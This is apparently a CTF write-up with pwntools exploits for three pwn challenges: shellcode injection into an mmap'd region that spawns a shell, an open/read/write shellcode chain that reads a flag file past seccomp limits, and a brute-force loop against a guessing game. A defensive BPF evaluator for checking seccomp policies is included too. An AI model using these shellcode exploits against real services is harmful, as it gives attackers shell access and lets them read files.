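Solved 3 of 4; one of them fell to a lucky brute-force script, and the last challenge was Rust reversing...
myexec
mmap allocates a writable region, and the read function writes the input into that region.
Sending shellcraft.sh() directly as shellcode is enough.
exp: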
from pwn import *
context(log_level='debug', os='linux', arch='amd64')
# io = process("./service")
io = remote("43.143.7.127", 28003)
# The service reads our input into the mmap'd region and runs it
shellcode = asm(shellcraft.sh())
io.recvuntil(b"\n")
io.sendline(shellcode)
io.interactive()
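mymem
The main function body is the same as in the previous challenge, but seccomp-tools dump shows that this one restricts syscall numbers.
The restriction can still be bypassed by chaining the calls open("") + read("") + write().
exp: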
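from pwn import *
context(log_level='debug', os='linux', arch='amd64')
# io = process("./mymem")
io = remote("43.143.7.127", 28391)
# Address used as the buffer for read() and write()
tp_addr = 0x50000
# open the flag, read it into the buffer, write it to stdout;
# fd 3 assumes open() returns the first free descriptor
shellcode = asm(shellcraft.open("/home/ctf/flag.txt"))
shellcode += asm(shellcraft.read(3, tp_addr, 50))
shellcode += asm(shellcraft.write(1, tp_addr, 50))
io.recvuntil(b"\n")
io.sendline(shellcode)
io.interactive()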
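The seccomp restriction above can also be checked from the defender's side. The following is an added example, not part of the original writeup: a minimal classic-BPF evaluator that runs a filter against syscall numbers and reports whether the open + read + write chain is still permitted. Both filters are constructed for illustration (the challenge's real filter is not shown on this page), and the function names are hypothetical.

```python
ARCH_X86_64 = 0xC000003E
RET_ALLOW, RET_KILL = 0x7FFF0000, 0x00000000
LD_W_ABS, JEQ_K, RET_K = 0x20, 0x15, 0x06      # the BPF opcodes used below
SYSCALLS = {"read": 0, "write": 1, "open": 2, "execve": 59,
            "openat": 257, "execveat": 322}    # x86-64 syscall numbers

# Constructed denylist: (code, jt, jf, k), same columns as a seccomp-tools dump.
DENYLIST_FILTER = [
    (LD_W_ABS, 0, 0, 4),                       # A = seccomp_data.arch
    (JEQ_K, 0, 4, ARCH_X86_64),                # foreign arch -> kill
    (LD_W_ABS, 0, 0, 0),                       # A = seccomp_data.nr
    (JEQ_K, 2, 0, SYSCALLS["execve"]),         # execve -> kill
    (JEQ_K, 1, 0, SYSCALLS["execveat"]),       # execveat -> kill
    (RET_K, 0, 0, RET_ALLOW),                  # everything else allowed
    (RET_K, 0, 0, RET_KILL),
]
# Constructed allowlist: only read and write pass, anything else is killed.
ALLOWLIST_FILTER = [
    (LD_W_ABS, 0, 0, 4),
    (JEQ_K, 0, 4, ARCH_X86_64),
    (LD_W_ABS, 0, 0, 0),
    (JEQ_K, 1, 0, SYSCALLS["read"]),
    (JEQ_K, 0, 1, SYSCALLS["write"]),
    (RET_K, 0, 0, RET_ALLOW),
    (RET_K, 0, 0, RET_KILL),
]

def run_filter(prog, nr, arch=ARCH_X86_64):
    """Return the action the filter takes for one syscall number."""
    data = {0: nr, 4: arch}                    # offsets in struct seccomp_data
    acc, pc = 0, 0
    while pc < len(prog):
        code, jt, jf, k = prog[pc]
        if code == LD_W_ABS:
            acc = data[k]
        elif code == JEQ_K:
            pc += jt if acc == k else jf       # jumps are relative to pc + 1
        elif code == RET_K:
            return k
        else:
            raise ValueError(f"unsupported opcode {code:#x}")
        pc += 1
    raise ValueError("filter ended without a RET instruction")

def file_read_chain_open(prog):
    """True if the policy still permits (open or openat) + read + write."""
    ok = {name for name, nr in SYSCALLS.items()
          if run_filter(prog, nr) == RET_ALLOW}
    return bool(ok & {"open", "openat"}) and {"read", "write"} <= ok
```

A policy that only blocks the exec family leaves the file-read chain intact, while the allowlist closes it because open and openat never reach the allow branch.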
oldfashion
Solved in an unintended way.
from pwn import *
context(log_level='debug', os='linux', arch='amd64')
# io = process("./zzzzz")
io = remote("43.142.108.3", 28524)
# Keep answering "2" until the service reports a correct guess
while 1:
    io.sendline(b"2")
    if io.recv() == (b"Congratulations! You guessed the number correctly.\n"):
        break
io.interactive()